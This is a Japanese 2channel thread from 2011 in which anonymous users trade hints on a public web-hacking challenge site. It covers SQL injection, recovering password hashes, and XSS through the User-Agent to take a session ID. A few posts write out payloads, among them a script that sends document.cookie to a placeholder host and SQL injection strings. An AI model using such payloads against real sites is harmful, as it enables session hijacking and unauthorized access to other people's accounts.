434名無しさん@お腹いっぱい。:2011/02/24(木) 20:29:38.69
Lv3変わったって書いてあったから見に行ったら殆ど変わってなくてワロタ
435名無しさん@お腹いっぱい。:2011/02/24(木) 20:32:26.73
>>434
UNIXいじったことあるなら考える必要もないしね
解法は一緒だし
436名無しさん@お腹いっぱい。:2011/02/24(木) 20:34:45.06
!?
>>433
>>297と話が違うぞ、いったいどういうこと?
437名無しさん@お腹いっぱい。:2011/02/24(木) 20:37:10.69
Lv3ほとんど変わってないwwww変わったことといえばパスワードが適当じゃなくなった感じ
438名無しさん@お腹いっぱい。:2011/02/24(木) 20:50:06.17
今日でchromeの拡張が2個増えた
439名無しさん@お腹いっぱい。:2011/02/24(木) 20:52:22.64
何入れたの
440名無しさん@お腹いっぱい。:2011/02/24(木) 20:58:32.97
UAいじるのとcookieいじるの
UAはいちいち起動オプションに設定するのが面倒だったからいれた
441名無しさん@お腹いっぱい。:2011/02/24(木) 21:04:57.11
>>436
>>297は釣りだろ
442名無しさん@お腹いっぱい。:2011/02/24(木) 21:08:09.88
別に釣りではないとおもうけど、ログを最近の状況じゃなくて未来の状況って書いてほしかったw
443名無しさん@お腹いっぱい。:2011/02/24(木) 21:13:31.43
わかんねーw
UAしかログに残らないのに、そこに正規ユーザーのsessionidを書き込める?
444名無しさん@お腹いっぱい。:2011/02/24(木) 21:17:40.25
にしてもいやなログイン履歴だな
445名無しさん@お腹いっぱい。:2011/02/24(木) 21:18:11.49
Lv3がわからない俺は馬鹿なのか・・・。
暗号化されたパスワードはみつけたみたいなんだけど・・・。
446名無しさん@お腹いっぱい。:2011/02/24(木) 21:22:24.08
>>402
おれもセッションIDは盗めたんだけど、使い方がわからんwww
447名無しさん@お腹いっぱい。:2011/02/24(木) 21:24:04.80
使い方教えてやるから盗み方教えて
448名無しさん@お腹いっぱい。:2011/02/24(木) 21:25:54.84
盗んだとか言ってるやつ、普通に自分のsessionidを盗んだものとか勘違いしてんじゃねえのかw
449名無しさん@お腹いっぱい。:2011/02/24(木) 21:27:22.44
誰かに踏ませるわけでも無いだろうしどう盗めと。
450名無しさん@お腹いっぱい。:2011/02/24(木) 21:31:53.45
盗めるよ。
俺も >>449 と同じこと考えてたんだけど、騙されたと思ってやってみ。
451名無しさん@お腹いっぱい。:2011/02/24(木) 21:33:01.83
452名無しさん@お腹いっぱい。:2011/02/24(木) 21:36:34.16
直近5件ってもしかして一番下が最新って設定?
453名無しさん@お腹いっぱい。:2011/02/24(木) 21:36:37.19
というか、誰かLv3のヒントか答え教えてくれ。。。
シャドウファイルは解析しないとだめなのか・・?
454名無しさん@お腹いっぱい。:2011/02/24(木) 21:38:36.95
shadowファイルが本来の場所にないけどどこにあるんだよ
455名無しさん@お腹いっぱい。:2011/02/24(木) 21:40:11.57
master.passwd
456名無しさん@お腹いっぱい。:2011/02/24(木) 21:40:12.31
lv5が不明すぎる
457名無しさん@お腹いっぱい。:2011/02/24(木) 21:41:27.24
Lv4難しいな
今日のところはこれで勘弁してやるw

>>454
なくなったんだよ
458名無しさん@お腹いっぱい。:2011/02/24(木) 21:42:41.14
>>455
BSDになったのか
459名無しさん@お腹いっぱい。:2011/02/24(木) 21:45:07.96
>>455
ヒントすぎんぞw
460名無しさん@お腹いっぱい。:2011/02/24(木) 21:46:08.86
>>452だとすれば解き方はわかったかも。
461名無しさん@お腹いっぱい。:2011/02/24(木) 21:46:16.95
LV4が鯖必要なのかだけでも知りたいな。
462名無しさん@お腹いっぱい。:2011/02/24(木) 21:46:29.70
さてはLinuxしか使ったことないな
463名無しさん@お腹いっぱい。:2011/02/24(木) 21:53:39.13
Lv.2がわからねえ
エラーでたが、その後が・・・
464名無しさん@お腹いっぱい。:2011/02/24(木) 21:56:02.40
>>450 です。Lv4 クリアしました。
465名無しさん@お腹いっぱい。:2011/02/24(木) 21:56:42.00
>>455
改めてlv3やったが、なんぞこれ
修正方向がわからないw

466名無しさん@お腹いっぱい。:2011/02/24(木) 21:58:10.81
>>464
ヒントくれー
仕事が手につかん
467名無しさん@お腹いっぱい。:2011/02/24(木) 22:01:02.37
そういやLv1。
うちの環境だと右クリック禁止です。って出たあとにコンテキストメニューがでるw
468名無しさん@お腹いっぱい。:2011/02/24(木) 22:01:26.81
dolpen...
469名無しさん@お腹いっぱい。:2011/02/24(木) 22:08:30.95
はい…
470名無しさん@お腹いっぱい。:2011/02/24(木) 22:13:57.45
>>466

>>461 がヒントっちゃーヒントになってます。
変な思い込みは捨てて、いろいろやってみると進むかも。
471名無しさん@お腹いっぱい。:2011/02/24(木) 22:19:59.09
Lv3のヒント教えてクレーorz
472名無しさん@お腹いっぱい。:2011/02/24(木) 22:23:25.21
今頃スレ読んでるんだけど、
>>405はGUIでやってるんだよな?
GUIは辞書クラックじゃないと駄目
GUIでクラック1回やって成功すると次から出来なくなるので生成されたファイルを削除しないと次が出来なくなる
更に言えば色々不具合あるからDOS画面でやったほうがいい
473名無しさん@お腹いっぱい。:2011/02/24(木) 22:23:57.75
>>471
Lv3はもう答えに近いものが出てるぞ
474名無しさん@お腹いっぱい。:2011/02/24(木) 22:24:47.04
鯖使わないなら何なんだ・・・知識が無い
475名無しさん@お腹いっぱい。:2011/02/24(木) 22:26:33.77
LV4なんとなくわかったけど、どうすんだこれ。書き換えできん。
間違ってるだけなのかもしれんが
476名無しさん@お腹いっぱい。:2011/02/24(木) 22:28:37.69
>>474
よく考えろよ。
お前のセッションIDでhogehogeの奴にログインさせれば良いだろ。
477名無しさん@お腹いっぱい。:2011/02/24(木) 22:32:14.60
何でこんな低レベルな問題ぐらいでハッカー扱いなのか分からん。
478名無しさん@お腹いっぱい。:2011/02/24(木) 22:35:18.04
>>476
セッション固定攻撃は関係ないよん。

>>477
たしかに、Lv4 までは既によく知られた攻撃方法だからね。
ぜひ、Lv5 一番乗りを目指してください。
479名無しさん@お腹いっぱい。:2011/02/24(木) 22:37:03.63
>>474
自鯖使うの? でも、それって無理じゃね? ・・・って言う発想は
(方向性としては)合ってる。
480名無しさん@お腹いっぱい。:2011/02/24(木) 22:37:44.23
Lv4 難しそう・・・
481名無しさん@お腹いっぱい。:2011/02/24(木) 22:38:35.10
Lv5はこの会社の製品テストか
時間の無駄だった
482名無しさん@お腹いっぱい。:2011/02/24(木) 22:38:54.57
解けてないけど直近5件のログイン状況っていう文字列が勘違いさせられてる原因な気がする
483名無しさん@お腹いっぱい。:2011/02/24(木) 22:45:18.26
>>482
ログイン状況は、かなりデカいヒントだよ。
だって、今まであんなのなかったでしょ?www
484名無しさん@お腹いっぱい。:2011/02/24(木) 22:45:29.18
Lv5は成功者が出ないうちは考え始めないほうが生産性高そう。
裏はGAEだから製品プロモではないにしても、広告PV増やすためのダミーな気が…
485名無しさん@お腹いっぱい。:2011/02/24(木) 22:47:25.85
URLの「Lv4/?」の?って意味あんのかなーとか、alertって入れた時しか「スクリプトが実行可能なようです」って出ないけどそうじゃない場合は全部無効なのかなーとか色々気になる
486とある、中学生:2011/02/24(木) 22:47:41.27
Lv3までは簡単だがLv4からはどうなのだろう
487名無しさん@お腹いっぱい。:2011/02/24(木) 22:52:29.94
  /      /           ',. \ ヽ
 /     / ;.             ,,,,,  ヽ ) 
 {     ./ ',         ,,.'''"  `ヽ 彡
  !    i   ' , ,,,,,       ,r''(・)ヽ  彡
  i     ミ   〃  ゙゙゙゙''    ′.`"´,/ ヾ.
.  ',   (    ,r'(・ )`'ヽ    `'''''"    !
   ',  彡       `"´ ノ }  ゝ      {  もっと答えちょうだい〜
   ', 〆、ミ      ー- ''" ( ,、_ッ^′     i
    '{ ⌒              ,,___,.   / .}      
    \  i、        -‐"ニ' i´  /  ノ
      i           Uヽ ,,,,ノ   i /        
      \,,,ノi \            {./
488名無しさん@お腹いっぱい。:2011/02/24(木) 22:53:22.46
>>481
これGAEだぞ。
489名無しさん@お腹いっぱい。:2011/02/24(木) 22:57:09.28
「スクリプトが実行可能なようです」は、苦肉の策だろうから、額面どおりに受け取ってあげてくれ。
490名無しさん@お腹いっぱい。:2011/02/24(木) 22:59:22.97
だって意味わかんねえじゃん
なんでalertだけ通るんだよ
そんな情況ありえないだろ
491名無しさん@お腹いっぱい。:2011/02/24(木) 23:04:59.11
alert通る状態って実際ならやり放題的な状況な気がするんだけど
全然コードが通らなくてなんかもやもやする
492名無しさん@お腹いっぱい。:2011/02/24(木) 23:06:11.59
(´・ω・`)LV2からむりなんだわ
493名無しさん@お腹いっぱい。:2011/02/24(木) 23:10:05.11
>>490
やっ、まあそれはそうなんだけどさwww

あくまで、Hackme の脆弱性は、人工的に作られた脆弱性。

そんな事いったら、Lv2 で本来なら間違いなく通るはずのSQLを散々叩いて
あげく、それをチョロッと変形させただけの「出題者が期待するSQL」がスルッと
通って、若干ムカついた俺のような奴も居るわけで・・・。
494名無しさん@お腹いっぱい。:2011/02/24(木) 23:11:12.79
>>493
確かにあれにむかついた人は多いはず
495名無しさん@お腹いっぱい。:2011/02/24(木) 23:11:58.61
Lv2はよくあるインジェクションに一手間加えれば通るよな
きっちりエスケープもされるし
496とある、中学生:2011/02/24(木) 23:12:13.05
同意
497名無しさん@お腹いっぱい。:2011/02/24(木) 23:13:31.10
不正解です!とかはっきり出してくれればいいのに
498名無しさん@お腹いっぱい。:2011/02/24(木) 23:14:55.38
UAにスクリプトしこんどくっていうのは違う?
499名無しさん@お腹いっぱい。:2011/02/24(木) 23:15:16.84
>>491
これは本当にそう思う。

alert 通るなら・・・
  こう書いたら、こう言う動きになる ⇒ あれ? ならねえ。
ってのが普通にあるからな。
だから、色々試してみて、ちょっとずつ間合いを積めるってのがやり難い。

ある程度(こう言う脆弱性があるんだろうと言う)正解の道筋が見えてないと
厳しいね。
500名無しさん@お腹いっぱい。:2011/02/24(木) 23:15:57.12
lv3 50人ちょっと通過したか
501名無しさん@お腹いっぱい。:2011/02/24(木) 23:16:30.99
今日の0時は150人もいなかったのにな
502名無しさん@お腹いっぱい。:2011/02/24(木) 23:18:25.20
スクリプトが実行可能なようですw
なら実行させさせてくれよw
503名無しさん@お腹いっぱい。:2011/02/24(木) 23:19:19.55
作者の想定した方法しか通らないからなw

単体だと正常にエンティティ化される→脆弱性ないと判断

が、組み合わせるとエンティティ化されずに通るとか罠すぎる。
504名無しさん@お腹いっぱい。:2011/02/24(木) 23:20:17.38
スクリプトが実行可能なようですってどう出すの?
てかUAにスクリプトって仕込めるのか?
505名無しさん@お腹いっぱい。:2011/02/24(木) 23:20:19.87
>>493
若干とは優しいな・・
せめてどんなSQL想定してるかは決めておかないと
徐々に構造を明らかにしていく楽しみがないわー
何故かlike検索にするとか、もちょいひねり方はあっただろうに
506名無しさん@お腹いっぱい。:2011/02/24(木) 23:23:46.15
>>499
これ見る感じ方向性はあっているみたいで安心した
しばらく続けるわ
507名無しさん@お腹いっぱい。:2011/02/24(木) 23:26:17.95
XSSを踏んだhogehogeがsessionidを露出させるようなスクリプト?そんなの知らねえー
508名無しさん@お腹いっぱい。:2011/02/24(木) 23:28:31.94
Lv2突破した人に聞きたいんだけど、普通のSQLインジェクションが通らない理由は
ちゃんとあるの?それとも作者の用意したパターンに合致しない限り駄目なだけ?
509名無しさん@お腹いっぱい。:2011/02/24(木) 23:29:49.36
>>508
エスケープがきちんとされてるとしたら通らない理由もわかると思う
510名無しさん@お腹いっぱい。:2011/02/24(木) 23:31:10.44
>>508
残念ながら「作者の用意したパターンに合致しない限り駄目」です。
とは言っても、そこまでイヤらしいもんじゃないので、色々やってればクリアできるんじゃないかな。
511とある、中学生:2011/02/24(木) 23:32:02.77
いつの間にかLv3クリアした人が600人超えてたww
512名無しさん@お腹いっぱい。::2011/02/24(木) 23:34:22.27
どっかのアホがIDとPW公開したから増えたんだよ
513名無しさん@お腹いっぱい。:2011/02/24(木) 23:35:08.26
本物の脆弱性を仕込んでほしいなー
ユーザ毎にサンドボックスみたいなの用意するのは無理なのかしら
514名無しさん@お腹いっぱい。:2011/02/24(木) 23:36:33.37
>>505
確かに、徐々に構造を明らかに・・・ってのは、その通りだと思う。
けど、それを本気でやろうとしたらSQLパーサを作んなきゃいけない訳で。
それはかなりダルいよなぁと思う。
515名無しさん@お腹いっぱい。:2011/02/24(木) 23:36:39.18
>>513
GAEだぞ
516名無しさん@お腹いっぱい。:2011/02/24(木) 23:38:19.07
>>509
だいたいにしてあんなに綺麗に「こちらの入力した文字列だけ」が
エラーとして表示されるわけはないので
そこで解析の思考が止まってしまうんだよなー
すでにありえない敵を相手してる前提になってしまう
517名無しさん@お腹いっぱい。:2011/02/24(木) 23:39:05.97
ぶっちゃけこういうことがしたいのにGAEなんかで実装してる時点で企業の力量が知れるわなww
518名無しさん@お腹いっぱい。:2011/02/24(木) 23:39:22.51
このスレのやつらが本気で作ったらもっとすごいのができそうだなw
519名無しさん@お腹いっぱい。:2011/02/24(木) 23:40:26.20
<script>document.location="httpp://xxx.xxx/?cookie="+document.cookie</script>
も通らないなー
520名無しさん@お腹いっぱい。:2011/02/24(木) 23:40:39.75
lv4はどういうコード書けばいいの?
どっかに転送させるの?その場に表示させるの?

521名無しさん@お腹いっぱい。:2011/02/24(木) 23:42:31.85
>>520
それに答えちゃうと、そのまま正解になってしまう・・・ってのがヒント。
522名無しさん@お腹いっぱい。:2011/02/24(木) 23:42:46.20
変な置換処理の所為で一向に進まねえ!
523名無しさん@お腹いっぱい。:2011/02/24(木) 23:43:56.72
>>517
短期的なキャンペーンにクラウド使うのは、良くある事だと思うんだけど。
力量が知れる理由を教えて。
524名無しさん@お腹いっぱい。:2011/02/24(木) 23:46:20.09
>>519
だから外部鯖はいらんといってるだろ。ログ見たのかよ。
525名無しさん@お腹いっぱい。:2011/02/24(木) 23:48:15.02
1911
526名無しさん@お腹いっぱい。:2011/02/24(木) 23:49:08.22
>>517
どんなリソースを使うかはリスクやらコストやらの問題だろ。
仮に本物の凄腕ハッカーが来たとしても相手するのはgoogleだし、
ネットファイアは蜂に刺された程度の痛みしかないしね。
527名無しさん@お腹いっぱい。:2011/02/24(木) 23:49:13.95
>>523
お、中の人か?
lv2、lv4の問題見れば、「力量が知れる」と言った意味がわかるだろう
別に普通のWEBアプリにGAE使うなって言ってるわけじゃないよ
528名無しさん@お腹いっぱい。:2011/02/24(木) 23:49:28.60
<script>alert(document.cookie)</script>
なぜ↑が効かないんだ〜〜〜〜
529名無しさん@お腹いっぱい。:2011/02/24(木) 23:49:51.85
社員張り付きすぎワロタ
530名無しさん@お腹いっぱい。:2011/02/24(木) 23:50:14.82
>>528
それが通って何の意味があるのかと
531名無しさん@お腹いっぱい。:2011/02/24(木) 23:51:05.11
>>528
それ表示されるのは自分のクッキーだろ。
何だこのスレ、素人しかいないのか?
532名無しさん@お腹いっぱい。:2011/02/24(木) 23:52:25.70
>>528
それが効いたとしても自分の cookie の値がわかるだけじゃね?
533名無しさん@お腹いっぱい。:2011/02/24(木) 23:53:29.39
528フルボッコワロタ
534名無しさん@お腹いっぱい。:2011/02/24(木) 23:54:06.75
時系列上から下だよな多分
535とある、中学生:2011/02/24(木) 23:54:10.16
とはいっても、これに挑戦している人は9万人越えらしいが実際にLv3クリアして増してやLv4もクリアした人はかなり少ないんだな。
536名無しさん@お腹いっぱい。:2011/02/24(木) 23:55:04.34
<script>document.location="http://hackme.netfire.jp/Lv5/login"</script>
も通らんな。
537名無しさん@お腹いっぱい。:2011/02/24(木) 23:55:38.62
テスト方法として>>528みたいなことを試す人はいるだろw
538名無しさん@お腹いっぱい。:2011/02/24(木) 23:56:12.66
自鯖使わずにhogehogeのsessionidとやらを抜き出す方法なんてどう考えても思いつかん。UAってjavascriptで変えられるのか?
539名無しさん@お腹いっぱい。:2011/02/24(木) 23:59:34.56
LV4はなんだ
決まった処理じゃないとscriptの内容消されるのか
540名無しさん@お腹いっぱい。:2011/02/25(金) 00:01:11.20
>>538
UA変える方法は、いくらでもあるでしょ?
541名無しさん@お腹いっぱい。:2011/02/25(金) 00:01:46.18
LV4 のログって上と下どっちが新しいの?
542名無しさん@お腹いっぱい。:2011/02/25(金) 00:03:00.62
>>541
多分下。じゃないと何もできないと思う。
543名無しさん@お腹いっぱい。:2011/02/25(金) 00:05:04.16
>>541
上だよ。これを踏まえればログが何を意図してるかが分かる。
544名無しさん@お腹いっぱい。:2011/02/25(金) 00:05:58.75
>>541
上ですね。
一番上の奴が自分。
545名無しさん@お腹いっぱい。:2011/02/25(金) 00:06:03.36
foobarがログイン中ってことだ
546名無しさん@お腹いっぱい。:2011/02/25(金) 00:06:47.73
こう書いたらこうなってこうなります。ってのがあるんだろうな
って上なのかよ。
547名無しさん@お腹いっぱい。:2011/02/25(金) 00:07:06.45
風婆め、そのセッションをこっちによこせと
548名無しさん@お腹いっぱい。:2011/02/25(金) 00:08:22.10
Lv4も9割方ネタバレされてるからまたメンテ入りそうだなw
549名無しさん@お腹いっぱい。:2011/02/25(金) 00:09:02.78
やっとLv4クリア
でも、これはちょっとおかしいよな
まぁ脱出ゲームみたいなもんか
550名無しさん@お腹いっぱい。:2011/02/25(金) 00:09:54.38
>>548
の割にはランキングが増えないね。
つーか、Lv5・・・。
551とある、中学生:2011/02/25(金) 00:11:18.76
Lv5・・・。
できねぇ・・・。どうやったらいけるか?
552名無しさん@お腹いっぱい。:2011/02/25(金) 00:11:21.48
やっぱ上かー。
そうなると foobar のセッションをジャックするしかないと思うんだけど、でも foobar はすでにログインしてるんだからログのページにスクリプト仕組んだところで見に来なくね?
553名無しさん@お腹いっぱい。:2011/02/25(金) 00:12:02.00
>>552
それが気になってしょうがない
554名無しさん@お腹いっぱい。:2011/02/25(金) 00:13:05.09
問題がクソな気がしてならない
555名無しさん@お腹いっぱい。:2011/02/25(金) 00:13:08.74
>>552
そう思っていた時期が俺にもありました。
556名無しさん@お腹いっぱい。:2011/02/25(金) 00:13:46.76
lv4は作成者が問題よくないって言ってたからなww
557名無しさん@お腹いっぱい。:2011/02/25(金) 00:14:28.86
独自解釈で上が最新のログとした後に自分のログを一番したにもっててかつログインできてないのに
先にセッションつくっちゃうクソwebアプリとして考えたw
558名無しさん@お腹いっぱい。:2011/02/25(金) 00:15:41.14
日本語でおk
559名無しさん@お腹いっぱい。:2011/02/25(金) 00:16:16.07
Foobarさんはログイン成功したのに成功画面リロードしてるお茶目さん。
560名無しさん@お腹いっぱい。:2011/02/25(金) 00:16:46.82
UAに<script>〜</script>を書くだけの簡単なお仕事
561名無しさん@お腹いっぱい。:2011/02/25(金) 00:18:57.21
確かに問題が「クソ」かもしれない
でもこの辺りが落とし所なのかもとも思うね
562名無しさん@お腹いっぱい。:2011/02/25(金) 00:22:01.27
Lv4はIE6.0ってのもヒント?
563名無しさん@お腹いっぱい。:2011/02/25(金) 00:24:29.06
>562
お、いい感じ 64bitもポイント
564名無しさん@お腹いっぱい。:2011/02/25(金) 00:25:49.53
なんでも鵜呑みにするのは危険
IDでないしw
565名無しさん@お腹いっぱい。:2011/02/25(金) 00:27:02.52
>>563
俺は gzip が重要だと思う。
566名無しさん@お腹いっぱい。:2011/02/25(金) 00:27:47.20
Lv2がどうしてもわからん
括弧でくくってあることを考えて') Or ('a'='aとか
定数が先でフィールドが後になっているのかと思ってa'='a' Or 'とかやっても駄目だし
このありえないエラー表示から何を読み取ればいいのよ
567名無しさん@お腹いっぱい。:2011/02/25(金) 00:28:32.27
>>566
全部エスケープされるじゃんそれ
568名無しさん@お腹いっぱい。:2011/02/25(金) 00:29:00.05
じゃ俺はTrident/4.0。

てかyoutube見てたらいっぱいhackのやり方のせてる奴らいるから見てみればいい。
xss hackとか。がんばれー
569名無しさん@お腹いっぱい。:2011/02/25(金) 00:30:46.94
>>566
Lv2 インジェクションじゃないよ
570名無しさん@お腹いっぱい。:2011/02/25(金) 00:30:55.37
>>566
俺と同じところでひっかかったな
あのSQLはSQLインジェクション対策にSQLの最後に未知の処理が仕込んであって異常を検出してる
571名無しさん@お腹いっぱい。:2011/02/25(金) 00:31:13.43
>>567
ええと・・・エスケープされたらSQLエラーにはならないんじゃ・・・
572名無しさん@お腹いっぱい。:2011/02/25(金) 00:31:19.40
とっとと Lv4 をクリアして、Lv5 包囲網を作ってほしい。
573名無しさん@お腹いっぱい。:2011/02/25(金) 00:32:10.22
Lv4のヒントください
574名無しさん@お腹いっぱい。:2011/02/25(金) 00:33:04.15
>>573
XSS
575名無しさん@お腹いっぱい。:2011/02/25(金) 00:33:11.97
おれはLv5のキッカケが知りたい
576名無しさん@お腹いっぱい。:2011/02/25(金) 00:33:20.19
>>569
えーLv2ってインジェクションじゃないの?それは意外だった
もうでょい考えてみるか・・・
>>570
ヒントあんがと
577名無しさん@お腹いっぱい。:2011/02/25(金) 00:33:20.23
gzip(gfe),gzip(gfe),・・・
ヘルプ
578名無しさん@お腹いっぱい。:2011/02/25(金) 00:33:26.84
>>568
英語分りません><
579名無しさん@お腹いっぱい。:2011/02/25(金) 00:33:41.99
>>574
どんなスクリプトかおしえてください
580名無しさん@お腹いっぱい。:2011/02/25(金) 00:34:17.35
>>573
あれだけのヒントが与えられてXSSを思い付かないのならムリ
ネタバレを待て
581名無しさん@お腹いっぱい。:2011/02/25(金) 00:35:38.35
>>579
いや、それ答えだからw
答えをそのまま打ち込んでも楽しくないでしょうよw
582名無しさん@お腹いっぱい。:2011/02/25(金) 00:36:00.55
lv4クリアしたひとの中で誰か
lv5いけるようにした捨てアカウント
さらしてくれませんか?
583名無しさん@お腹いっぱい。:2011/02/25(金) 00:36:02.26
このプロモーションは有効だな
セキュリティなんてどんだけ口うまいやつが風呂敷広げるかだからな
584名無しさん@お腹いっぱい。:2011/02/25(金) 00:36:27.22
つーか、9万人以上参加してんのに、Lv5 クリアした奴が一人も居ないとかどうなってんの!?
585名無しさん@お腹いっぱい。:2011/02/25(金) 00:37:11.57
>>582
お、新しいね
でもLv4の方が為にはなるぜ、Let's google
586名無しさん@お腹いっぱい。:2011/02/25(金) 00:38:04.49
ここだけの話、lv4をクリアしたひとはいない
理由はlv2の時、lv3の話をした内容を思い出せばわかるよ

ヒント:そいつらは全員lv3はxssだと言っていたw
587名無しさん@お腹いっぱい。:2011/02/25(金) 00:39:33.14
>>586
Σ(・ε・;)  タシカニ…
588名無しさん@お腹いっぱい。:2011/02/25(金) 00:40:53.98
>>586
Lv3を見てxssというヤツは素人では
589名無しさん@お腹いっぱい。:2011/02/25(金) 00:41:07.03
でもLv4クリアした人は増えてるから正解も混ざってる
590名無しさん@お腹いっぱい。:2011/02/25(金) 00:41:43.64
LV4 をクリアするよりも LV4 をクリアしたやつらのアカウントを奪う方が簡単だったりしてなw
591名無しさん@お腹いっぱい。:2011/02/25(金) 00:42:04.80
LV4できた ちょっと笑ったわ
592名無しさん@お腹いっぱい。:2011/02/25(金) 00:42:34.41
>>590
はは、やってみろ
593名無しさん@お腹いっぱい。:2011/02/25(金) 00:42:45.85
>>590
多分簡単だが、やったら不正アクセスで手が後ろに回るわw
594名無しさん@お腹いっぱい。:2011/02/25(金) 00:42:59.65
document.write('sessionid教えてください');
でいけたわ
595名無しさん@お腹いっぱい。:2011/02/25(金) 00:43:09.76
****さんの称号は、「ハッカー」です。なかなか。

やりますね。でも、もしセキュリティ関係者だったらこの位は普通でしょ?

続きから再開する
596名無しさん@お腹いっぱい。:2011/02/25(金) 00:43:54.25
そのうちに会社で遊んでるのがバレちゃうかも
フィルタ対象になってしまうかも..
597名無しさん@お腹いっぱい。:2011/02/25(金) 00:45:11.63
>>595
ちょっと前までLv3でその称号だったのにー
ネタバレするヤツがいるから降格だよ
598名無しさん@お腹いっぱい。:2011/02/25(金) 00:46:00.75
検索能力もハッキングの一つか...
599名無しさん@お腹いっぱい。:2011/02/25(金) 00:46:05.75
>>586
おれ途中からだが、素直にlv3まで解いたよ
3lvでパスが通らなかったから2chに来た
その後変更されたから3lv通って今lv4やってる

gzipってなんだよー
600名無しさん@お腹いっぱい。:2011/02/25(金) 00:46:29.82
>>591
なんで笑ったの?
601名無しさん@お腹いっぱい。:2011/02/25(金) 00:46:50.19
というかLv5ってあるの?
602名無しさん@お腹いっぱい。:2011/02/25(金) 00:47:26.44
にょきって出てくるアレならちょっと笑った
603名無しさん@お腹いっぱい。:2011/02/25(金) 00:48:23.65
>>600
できればわかる
色々ちゃんと用意したのが馬鹿みたいだわ
604名無しさん@お腹いっぱい。:2011/02/25(金) 00:51:28.24
そうかXSRFか
605名無しさん@お腹いっぱい。:2011/02/25(金) 00:52:28.85
もしかしてga.jsからクッキー(ry
606名無しさん@お腹いっぱい。:2011/02/25(金) 00:55:09.29
>>582
つ _try_lv5_
607名無しさん@お腹いっぱい。:2011/02/25(金) 00:55:20.32
LV5の手掛かりのなさは異常
というかLV4までの露骨な手掛かりが異常だった
608名無しさん@お腹いっぱい。:2011/02/25(金) 00:55:40.84
ちょっと見ない間にたまごたちが増えてるけど
ネタバレ中なの?
Lv3までならセキュリティ関連の情報を検索すれば自力でできるぜ
Lv4はちょっと無理すじ
609名無しさん@お腹いっぱい。:2011/02/25(金) 00:55:49.16
>>599
gzip?んなもん関係ない。
無視しろ
610名無しさん@お腹いっぱい。:2011/02/25(金) 00:56:11.90
>>607
確かに!
611名無しさん@お腹いっぱい。:2011/02/25(金) 00:57:23.88
>>599
ごめんなさい、gzip はジョークです。
612名無しさん@お腹いっぱい。:2011/02/25(金) 00:57:52.22
>>599
俺もgzipが怪しいと思ってるが、どうも進まない
613名無しさん@お腹いっぱい。:2011/02/25(金) 00:58:21.08
UAにクッキー詰めてログインに飛ばしても駄目なのか
もうどうしろと
614名無しさん@お腹いっぱい。:2011/02/25(金) 00:58:25.21
>>603
そんなに短いのか。
ちゃんと現実的に動くコードなのか怪しいな。
615名無しさん@お腹いっぱい。:2011/02/25(金) 00:58:33.24
>>607
確かにww レベルが進むごとに、なんか変なの追加されてんぞ状態。
616名無しさん@お腹いっぱい。:2011/02/25(金) 00:59:08.75
Lv5 解ける気がしない 
もう少しゲームとして楽しめるようにしてほしい
617名無しさん@お腹いっぱい。:2011/02/25(金) 00:59:23.35
Lv4を説いたっていう人沢山いるけど
21時頃からランキングに一人も追加されてないのはなんで?
618名無しさん@お腹いっぱい。:2011/02/25(金) 01:00:02.68
login.htmになんかスクリプト投げればいいのか?
619名無しさん@お腹いっぱい。:2011/02/25(金) 01:00:44.93
>>617
解いた直後に書いたら誰が書き込んだか判るだろw
620名無しさん@お腹いっぱい。:2011/02/25(金) 01:00:56.19
>>617
昼頃は中の人合わせて6人なのに今は・・・
621名無しさん@お腹いっぱい。:2011/02/25(金) 01:01:25.66
>>617
かなり増えてるよ。今45人くらい。
622名無しさん@お腹いっぱい。:2011/02/25(金) 01:02:16.89
そうかjsessionidか、なるほど
623名無しさん@お腹いっぱい。:2011/02/25(金) 01:02:47.10
フラクタルはじまっちゃったお
フラクタルの中にLv4の答えあるかな?
624名無しさん@お腹いっぱい。:2011/02/25(金) 01:03:22.77
夜になると帰宅する奴もいるだろう
今の50人ほどは素直に解いたものだと思う
625名無しさん@お腹いっぱい。:2011/02/25(金) 01:04:24.31
>>566だがようやくLv2通ったわ。ヒントくれた人たちありがとう。
だがしかし定数「1」がTrueと見なされないのは正直頭おかしいと思う。
626名無しさん@お腹いっぱい。:2011/02/25(金) 01:05:54.98
lv4の新しいヒントをくれ
ua,xss,scriptとかそう言うのはもうヒント貰う前に通り過ぎてそっからがわからん
627名無しさん@お腹いっぱい。:2011/02/25(金) 01:07:15.36
あきらメロン。どうせLv3もネタバレで解いたクチでしょう
628名無しさん@お腹いっぱい。:2011/02/25(金) 01:07:17.69
>>626
意味不明
629名無しさん@お腹いっぱい。:2011/02/25(金) 01:07:19.69
gzipはGAE使ってるとなぜかUAにくっつくんだよ
理由は全くわからん
630名無しさん@お腹いっぱい。:2011/02/25(金) 01:08:35.64
>>629
どうもそこがヒントらしいのだが...
おいらももう少し調べてみる
631名無しさん@お腹いっぱい。:2011/02/25(金) 01:08:40.90
gzip使ってるからだよ
632名無しさん@お腹いっぱい。:2011/02/25(金) 01:10:31.53
>>631
そうか、というこてはIDとパスワードをzipして
あそこに設定すればいいのか、試してみよう
633名無しさん@お腹いっぱい。:2011/02/25(金) 01:11:07.97
>>630
本当にごめんなさい。gzip はジョークです。

マジなヒントは >>626
634名無しさん@お腹いっぱい。:2011/02/25(金) 01:12:07.58
>>617
誰もクリアしてないから以外にあんの?
635名無しさん@お腹いっぱい。:2011/02/25(金) 01:13:15.45
Lv1から進めないんですけど、どうすればいいのでしょうか?
636とある、中学生:2011/02/25(金) 01:14:22.45
>>635
あきらめろ
637名無しさん@お腹いっぱい。:2011/02/25(金) 01:14:55.05
>>635
読売オンラインの記事をコピペするところから始めるべき
638名無しさん@お腹いっぱい。:2011/02/25(金) 01:15:03.18
それはSQLの仕様じゃないか
639名無しさん@お腹いっぱい。:2011/02/25(金) 01:15:15.39
誰でもクリアできるもんではないよ。
Lv4はヒント貰っても元々それなりに知識ある人じゃないとクリアできん。
スレ内で9割方ネタバレされてるけどクリア者あまり増えてないだろ?
640名無しさん@お腹いっぱい。:2011/02/25(金) 01:15:23.51
lv4は以前のlv2と同じような感じらしいので修正くるまで待ち
一字一句揃えて云々とかアホらしすぎる
641とある、中学生:2011/02/25(金) 01:15:43.95
まぁ、確かに そうかもしれん
642名無しさん@お腹いっぱい。:2011/02/25(金) 01:15:46.28
>>636
そ、そうですが...
643名無しさん@お腹いっぱい。:2011/02/25(金) 01:17:38.81
lv5がわからねーというかほとんどみんなやってないんだろうなlv4ぐらいで愛想つかして
644名無しさん@お腹いっぱい。:2011/02/25(金) 01:17:56.37
>>606
この垢ランキングに載ってるんだけどパスは?
645とある、中学生:2011/02/25(金) 01:17:57.68
Lv1とか、ソースコード見れれば簡単だろ。
つーか、中学生すらLv3クリアしてるのに大人ができないとかw
